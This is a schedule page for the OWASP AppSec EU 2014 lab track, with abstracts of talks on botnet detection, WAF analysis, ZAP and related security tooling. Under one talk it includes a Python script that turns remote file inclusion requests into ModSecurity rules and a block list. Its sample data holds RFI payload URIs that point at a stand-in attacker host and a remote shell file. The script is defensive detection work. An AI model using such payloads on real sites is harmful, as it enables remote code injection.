AppSec Europe 2014 has ended
Welcome to the full schedule of the OWASP AppSec Research EU 2014 conference days


LAB003
Wednesday, June 25

11:00 BST

Cloud-based Detection Techniques for Botnets and Other Malware
Traditional techniques for detecting malware, such as viruses, worms and rootkits, rely on identifying virus-specific signature definitions within network traffic, applications or memory. Because a sample of malware is required to define an attack signature, signature detection has drawbacks when dealing with polymorphic malware, has limited use in zero-day protection, and is a post-infection technique requiring malware to be present on a network or device in order to be detected.

Botnets are ideally suited for launching mass Distributed Denial of Service (DDoS) attacks against the ever increasing number of networked devices that are starting to form the Internet of Things, and ultimately Smart Cities. Regardless of topology, centralised with Command & Control (C&C) servers or distributed peer-to-peer (P2P), bots must communicate with the other bots in the botnet, as well as with their overall commanding botmaster. This communication traffic can be used to detect malware activity in the cloud well before it has been able to evade network perimeter defences, and to determine a route back to the source to take down the threat.

This presentation highlights the main drawbacks of traditional signature-based detection methods. It discusses the alternative technique of cloud-based traffic analysis for pre-infection detection of malware, in particular botnets, which can be performed on the big data generated by service providers, and demonstrates how cloud-centric, traffic-based detection techniques can complement traditional signature-based anti-malware and overcome some of its drawbacks.

Finally, this presentation identifies a lack of techniques for detecting malicious bot activity within virtual environments, which now form the backbone of data centre infrastructure and provide a new, as yet untapped, attack vector for future malware. This identified gap works as a precursor to my PhD research, which is to detect malware behaviour within virtual environments.


Mark Graham

PhD Student, Anglia Ruskin
Mark has spent 15 years in the IT Industry, wearing various hats, working for Kingston Communication, C&W (formerly Energis), Nortel Networks and Signify. 3 years ago, Mark completed an MSc in Network Security at Anglia Ruskin University. Mark is currently studying a PhD at Anglia...

Wednesday June 25, 2014 11:00 - 11:50 BST

11:50 BST

Monitoring Web Sites for Malware Injection with WebDetector
It’s estimated that 86% of all websites had at least one serious vulnerability during 2012. Attackers, either manually or automatically (via botnets), deploy C&C servers and malware droppers within exploited websites to infect clients. When such an intrusion is not detected by the owner, the website can deliver malware for long periods until somebody, privately or publicly, notices it and perhaps an investigation starts.

To tackle this, we have developed a web monitoring tool called WebDetector, that can be scheduled to run periodically over a list of domain names and to produce a score that indicates how malicious a page is. 

The tool is currently written in Python and relies on several open source components for mirroring, file tracking and indexing, plus a set of heuristics to detect harmful components such as JavaScript, PDF and Shockwave files, form spoofing and link redirection. The framework can be expanded with modular signatures to detect more types of attacks in future, with the help of the community.

We have tested the efficacy of WebDetector by deliberately adding common malicious behaviour to a controlled WordPress installation. More sophisticated malware strategies need refined heuristics for detection, which will be addressed in future.


Paolo Di Prodi

Machine Learning Engineer, Microsoft
I love control systems and robotics.

Wednesday June 25, 2014 11:50 - 12:35 BST

13:50 BST

Defending TCP Against DoS Attacks
On the global Internet, the main function of TCP is to provide a reliable byte stream for process-to-process communication. Today, TCP is the most widespread protocol used for exchanging data on the Internet and is responsible for more than 90 percent of the world's total Internet data traffic. Despite its widespread usage, many parts of the TCP protocol suite were designed with little consideration given to the security implications. For example, the TCP protocol stack can be vulnerable to a variety of attacks ranging from IP spoofing to denial of service.

This paper classifies a range of known TCP attack methods, focusing in particular on password sniffing, SYN flooding, IP spoofing, TCP sequence number attacks, TCP session hijacking, RST/FIN attacks and the low-rate TCP-targeted denial of service attack. The paper will also examine the vulnerable points of these TCP protocols in an attempt to provide solutions to such attacks. Finally, a real-time network simulation infrastructure will be provided, along with detailed experimental analysis to validate the efficiency of our security approaches.


Hesham El Zouka

Arab Academy for Science & Technology and Maritime Transport

Wednesday June 25, 2014 13:50 - 14:40 BST

14:40 BST

OWASP ZAP: Advanced Features
The Zed Attack Proxy (ZAP) is an OWASP Flagship project and the largest open source web application security tool measured by active contributors. While it is an ideal tool for people new to appsec it also has many features specifically intended for advanced penetration testing. 

In this talk Simon will give a quick introduction to ZAP and then dive into some of these features, including: 
* Handling single page and other ‘non standard’ apps 
* Client side testing with Plug-n-Hack 
* Advanced scanning options 
* Contexts 
* Fuzzing 
* Scripting 
* Zest - ZAP’s macro language 
* Changing the source code 


Simon Bennetts

ZAP Project Lead, Jit
Simon Bennetts is the OWASP Zed Attack Proxy (ZAP) Founder and Project Leader, and a Distinguished Engineer at Jit. He has talked about and demonstrated ZAP at conferences all over the world, including Blackhat, JavaOne, FOSDEM and OWASP AppSec EU, USA & AsiaPac. Prior to making the...

Wednesday June 25, 2014 14:40 - 15:30 BST

15:55 BST

Getting New Actionable Insights by Analyzing Web Application Firewall Triggers
The ModSecurity Web Application Firewall was first released more than a decade ago as open source software that gives the ability to protect web applications. Over the years ModSecurity has matured significantly and is the most widely deployed WAF, protecting millions of websites. Alongside the ModSecurity engine we can also find the OWASP ModSecurity Core Rule Set (CRS), a library of generic application security signatures that provides a base level of protection for any web application.

In this presentation I will show an advanced technique for post-processing ModSecurity Core Rule Set WAF triggers in order to generate actionable defenses derived from those triggers. The objective of the post-processing is to improve security controls. Based on the collected malicious HTTP traffic we can produce new insights into our attackers and the techniques they use, and as a result we can harden defenses and improve our mitigations.

The presentation will include a detailed description of several techniques, with case studies based on real traffic from Akamai's security big data platform (Cloud Security Intelligence).

Example: analysis of a remote file inclusion attack.

When analyzing the payload of a remote file inclusion attack we will find a link to a remote source code file that the attackers are trying to inject into the vulnerable application.
The injected remote source file is in many cases a static "anchor" in a continuous attack campaign that uses various RFI vulnerabilities with the same remote file.

Generating a signature that matches attacks based on the attack "anchor" can improve the detection capabilities of ModSecurity CRS and at the same time give better insight into the threat landscape.
More than that, this "anchor" can be used as enrichment for other security controls that monitor URL and domain reputation.

RFI attack:


In the attack above we can see the remote source file located at “www.attacker.com/malicous.php”. Knowing this malicious file can be valuable when:

  • Looking for the same link on HTTP traffic (complementary to ModSecurity CRS rules)

  • Blocking traffic from within the organization to the attacker web application

  • Correlating similar attacks as the same distributed attack campaign
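As an added example (not code from the talk or from Akamai's platform), the post-processing step described above in Python: pulling the remote-file "anchor" out of WAF-flagged request URIs, grouping hits into a campaign (which clients, which vulnerable endpoints), and emitting a ModSecurity rule plus an egress block list from it. The sample requests and client IPs are constructed; only the www.attacker.com/malicous.php anchor comes from the abstract, and the rule syntax assumes ModSecurity 2.x.

```python
"""Post-process RFI WAF triggers: extract the remote-file anchor and correlate a campaign."""
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample of WAF-flagged requests as (client_ip, request_uri).
# Only www.attacker.com/malicous.php is from the abstract; everything else is invented.
SAMPLE_TRIGGERS = [
    ("198.51.100.7", "/index.php?page=http://www.attacker.com/malicous.php?"),
    ("198.51.100.7", "/blog/view.php?tpl=http%3A%2F%2Fwww.attacker.com%2Fmalicous.php%00"),
    ("203.0.113.42", "/admin/load.php?inc=HTTP://WWW.ATTACKER.COM/malicous.php?&x=1"),
    ("203.0.113.42", "/index.php?page=ftp://mirror.example.net/shell.txt"),
    ("192.0.2.9", "/search.php?q=harmless+text"),
]

REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)


def anchor_from_value(value):
    """Return the normalised anchor (host/path) carried by a parameter value, or None."""
    # parse_qsl already decoded once; a second unquote catches double-encoded payloads.
    value = unquote(value).split("\x00", 1)[0].rstrip("?")  # drop %00 / '?' suffix tricks
    if not REMOTE_URL.match(value):
        return None
    parts = urlsplit(value)
    return parts.netloc.lower() + parts.path  # host is case-insensitive, path is not


def extract_anchors(request_uri):
    """Yield (parameter_name, anchor) for every remote-URL parameter in a request URI."""
    for name, value in parse_qsl(urlsplit(request_uri).query, keep_blank_values=True):
        anchor = anchor_from_value(value)
        if anchor:
            yield name, anchor


def correlate(triggers):
    """Group triggers by anchor: the clients using it and the endpoint+parameter they hit."""
    campaigns = defaultdict(lambda: {"clients": set(), "targets": set(), "hits": 0})
    for client_ip, uri in triggers:
        for param, anchor in extract_anchors(uri):
            entry = campaigns[anchor]
            entry["clients"].add(client_ip)
            entry["targets"].add(f"{urlsplit(uri).path}?{param}")
            entry["hits"] += 1
    return dict(campaigns)


def modsecurity_rule(anchor, rule_id):
    """Emit a ModSecurity 2.x SecRule (assumed syntax) that denies requests carrying the anchor."""
    return (f'SecRule ARGS "@contains {anchor.lower()}" '
            f'"id:{rule_id},phase:2,t:none,t:urlDecodeUni,t:lowercase,deny,log,'
            f"msg:'RFI campaign anchor {anchor}'\"")


def egress_blocklist(campaigns):
    """Hosts to deny from inside the organisation: the host part of each anchor."""
    return sorted({anchor.split("/", 1)[0] for anchor in campaigns})


if __name__ == "__main__":
    found = correlate(SAMPLE_TRIGGERS)
    for rule_id, (anchor, info) in enumerate(sorted(found.items()), start=900001):
        print(f"{anchor}: {info['hits']} hits, {len(info['clients'])} clients, "
              f"targets={sorted(info['targets'])}")
        print("  " + modsecurity_rule(anchor, rule_id))
    print("egress block:", egress_blocklist(found))
```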


Or Katz

Researcher, Akamai Technologies
Or Katz is a security veteran with years of experience at industry-leading vendors, and currently serves as principal lead security researcher for Akamai. Katz is a frequent speaker at security conferences and has published numerous articles, blogs and white papers on threat intelligence...

Wednesday June 25, 2014 15:55 - 16:45 BST

16:45 BST

Use of Netflow/IPFix Botnet Detection Tools to Determine Placement for Autonomous VMs
This paper describes a novel method of autonomously detecting malicious botnet behaviour within a cloud datacentre while at the same time managing Virtual Machine (VM) placement in accordance with its findings, and presents its implementation in the Scala programming language. A key feature of this method, which uses output from Netflow/IPFix, both of which are capable of producing detailed network traffic logs, is its capability of detecting unusual client behaviour through the analysis of individual data packet information.

It has been implemented as a module of an Autonomous Management Distributed System (AMDS) presented in [Dinita, R. I., Wilson, G., Winckles, A., Cirstea, M., Rowsell, T. (2013)], giving it direct access to all the VMs and Hypervisors on the Cloud network. As such, another key feature is that it can have an immediate and effective impact on network security in a Botnet attack context by issuing lockout commands to every networked VM through the AMDS. A proof of concept has been developed and is currently running successfully on the authors’ test bed. 


Razvan-Ioan Dinita

PhD research student and Lecturer, Anglia Ruskin University
Razvan-Ioan Dinita received a degree in Computer Science and Internet Technology from Anglia Ruskin University, Cambridge, UK. He is currently a PhD research student in Cloud Computing and a Lecturer in Computer Science and Cloud Computing at Anglia Ruskin University. His research...

Wednesday June 25, 2014 16:45 - 17:35 BST
Thursday, June 26

10:25 BST

Hybrid Analysis Mapping: Making Security and Development Tools Play Nice Together
Developers want to write code and security testers want to break it and both groups have specialized tools supporting these goals. The problem is – security testers need to know more about application code to do better testing and developers need to be able to quickly address problems found by security testers. This presentation looks at both groups and their respective toolsets and explores ways they can help each other out. 

Two different interactions are examined: 
• How can knowledge of code make application scanning better? 
• How can application scan results be mapped back to specific lines of code? 

Using open source examples built on OWASP ZAP, ThreadFix and Eclipse, the presentation walks through the process of seeding web application scans with knowledge gleaned from code analysis, as well as the mapping of dynamic scan results to specific lines of code. The end result is a combination of testing and remediation workflows that help both security testers and software developers be more effective. Particular attention is given to Java/JSP applications and Java/Spring applications, and how teams using these frameworks can best benefit from these interactions.


Dan Cornell

Vice President, Product Strategy, COALFIRE
A globally recognized software security expert, Dan Cornell has over 20 years of experience architecting, developing and securing software systems. As Vice President of Product Strategy at Coalfire, Dan works with customers and industry partners to help drive the direction of their...

Thursday June 26, 2014 10:25 - 11:15 BST

11:15 BST

Continuous Security Testing in a Devops World
Three key devops principles are the merging of skills in previously separate teams, extensive process automation and faster delivery through more frequent software deploys.

These present some interesting challenges to application security such as:

  • How to effectively communicate and manage security requirements in such a dynamic environment?

  • How to perform rigorous security testing when software is deployed multiple times per day?

  • How to integrate security processes into the existing continuous integration/deployment environments?

In this talk I will explore these questions and present an open source security testing framework that aims to address them through the use of Behaviour Driven Development (BDD).

A key concept from agile software development is that the software tests are the documentation. While this approach works well when all the stakeholders are developers, it can break down when neither the ops nor the security team are proficient in a programming language.

BDD offers a communication bridge between security, development and testing so that security requirements can be defined in a natural language; and yet still be executable as automated software tests.

The BDD-Security framework was created in order to provide a set of pre-defined security requirements that can be executed against most web applications with minimal changes. It uses Selenium and OWASP ZAP in order to mimic the testing that a human security tester would perform, including authentication and access control tests that were previously difficult to automate and beyond the capabilities of scanners. Since the framework is based on JBehave, which provides JUnit wrappers, it fits into existing automated deployment and continuous integration pipelines.

The talk will demonstrate how to configure the BDD-Security framework and how to integrate it with the Jenkins CI server in order to provide continuous and in-depth security testing that includes both functional and non-functional testing.

The result is an automated process from code commit, to build, deploy and security testing where the results of the tests are understandable by all stakeholders. 


Stephen de Vries

Founder, CEO, Continuum Security SL
Stephen is the founder of Continuum Security and focussed on building AppSec tools to support security in the SDLC, including the IriusRisk threat modeling tool and the BDD-Security open source security testing framework. His background is in software development and security testing...

Thursday June 26, 2014 11:15 - 12:05 BST

12:05 BST

ActiveScan++: Augmenting manual testing with attack proxy plugins
This presentation will introduce ActiveScan++ and demonstrate how it can be used to easily identify complex vulnerabilities in real world applications. ActiveScan++ is an open source Python plugin that builds upon Burp Suite's basic active scanning functionality. This talk will cover the classic and exotic vulnerabilities it can detect, as well as the pros and pitfalls that can be found with the proxy-plugin approach to automated vulnerability hunting.

ActiveScan++ uses heuristic probes to efficiently assess the susceptibility of the target to a range of cutting edge attack techniques, such as host header poisoning and relative path overwrites. In addition, ActiveScan++ provides robust identification of blind attack issues, helping to locate rare but critical vulnerabilities such as code injection that pentesters can't afford to miss. Demonstrations of the underlying mechanics of these attacks, how they can be automatically detected, and how we can actively exploit them once they have been identified will be performed throughout the presentation.

The presentation will finish with a discussion of current research into automated detection of 'suspicious' behaviour, in a manner similar to the initial stages of manual testing. These new techniques allow generic detection of entire vulnerability classes by combining platform-independent payload sets with fuzzy pattern matching.

This presentation will host the first public release of this open source tool.


James Kettle

Context Information Security
James Kettle has extensive experience in vulnerability bounty hunting across Mozilla's and Google's heavily secured infrastructure, resulting in being ranked 6th in Google's 0x0A list for 2012/13. As part of this he has performed security research culminating in novel attack techniques...

Thursday June 26, 2014 12:05 - 12:50 BST

13:50 BST

Barbican: Protect your Secrets at Scale
For sysadmins, your servers hold many pieces of sensitive information, whether they are iron, virtual or cloud boxes. These keys to your kingdom need protection but must also allow for infrastructure at scale. Current application security best practices talk about key management and key rotation, but offer little to no practical advice beyond policy and general statements.

This presentation discusses a proposed solution for key management, named Barbican, an open source project that is part of OpenStack. Its goal was to build a secure, Cloud-ready key management solution. Barbican can be used by OpenStack implementors or anyone willing to run a server or two. This talk will walk through the current state of Barbican, its technical architecture, how to use it as an internal or cloud service and demonstrate our current proof of concept implementation.


Matt Tesauro

Senior AppSec Engineer, Duo Security
Matt Tesauro is currently a Senior AppSec Engineer building an AppSec Pipeline and continuous security program for Duo Security. Prior, he worked full-time for the OWASP Foundation, adding automation and awesome to OWASP projects as the Operations Director. Previously, he was...

Thursday June 26, 2014 13:50 - 14:40 BST

16:00 BST

Shameful Secrets of Proprietary Network Protocols
There are plenty of tools offering HTTP/SSL traffic interception. However, when it comes to penetration tests of specialized embedded software or thick clients, we often encounter proprietary protocols with no documentation at all: binary TCP connections unlike anything a well-known local proxy can handle. Without disassembling the protocol, pentesting the server backend is very limited. Yet, based on our experience, it very often hides a shameful mystery - completely unsecured mechanisms breaking all good coding practices.

We would like to present our approach and a short guide to reverse engineering proprietary protocols - a world full of home-grown implementations of asymmetric cryptography, reversible hash algorithms, lack of user authentication, and no function or data access control at all.

To demonstrate, we will show 5 case studies - the most interesting examples from real-life financial industry software, which in our opinion are the quintessence of "security by obscurity". We will talk about home automation, embedded pull-printing software in multifunction printers (MFPs), remote desktop protocols, and twisted vulnerabilities in FOREX trading software, which is a particularly risky business with regard to security.


Slawomir Jasek

IT security consultant with over 10 years of experience. Participated in many assessments of systems' and applications' security for leading financial companies and public institutions, including a few dozen e-banking systems. Currently focuses on consulting on the design of secure solutions...

Jakub Kaluzny

Sr. IT Security Consultant, SecuRing
Jakub is a Senior IT Security Consultant at SecuRing and performs penetration tests of high-risk applications, systems and devices. He was a speaker at many international conferences: BlackHat Asia, OWASP AppSec EU, PHdays, HackInTheBox, ZeroNights, as well as at local security events...

Thursday June 26, 2014 16:00 - 16:50 BST